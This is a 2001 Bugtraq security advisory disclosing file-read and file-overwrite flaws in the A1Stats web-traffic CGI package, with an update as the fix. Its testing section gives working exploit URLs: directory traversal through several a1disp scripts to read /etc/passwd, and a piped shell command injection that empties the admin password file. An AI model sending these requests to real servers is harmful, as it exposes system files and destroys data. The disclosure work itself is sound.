From: neme-dhc@HUSHMAIL.COM To: BUGTRAQ@SECURITYFOCUS.COM Subject: Advisory for A1Stats Date: Mon, 7 May 2001 19:31:12 -0500 [ Advisory for A1Stats ] [ A1Stats is made by Drummond Miles ] [ Site: http://www.gadnet.com/a1stats ] [ by nemesystm of the DHC ] [ (http://dhcorp.cjb.net - neme-dhc@hushmail.com) ] [ ADV-0114 ] /-|=[explanation]=|-\ A1Stats is a CGI package to track website traffic. The package has a view files bug and also gives the possibility to overwrite existing files. /-|=[who is vulnerable]=|-\ Anyone using a A1Stats that was downloaded before 24/04/01. /-|=[testing it]=|-\ To test these vulnerabilities, try the following. www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd These two will give you /etc/passwd. www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd This will also give you /etc/passwd but it will show it in a very mangled manner as the CGI adds HTML tags to what it thinks is a file it created itself. One can also open a file and wreck its contents. http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt| will empty a1admin.txt. a1admin.txt contains the password to change settings of the CGI. When this file is removed, no one can log in anymore. /-|=[fix]=|-\ Downloading the latest version will solve this problem. Free, encrypted, secure Web-based email at www.hushmail.com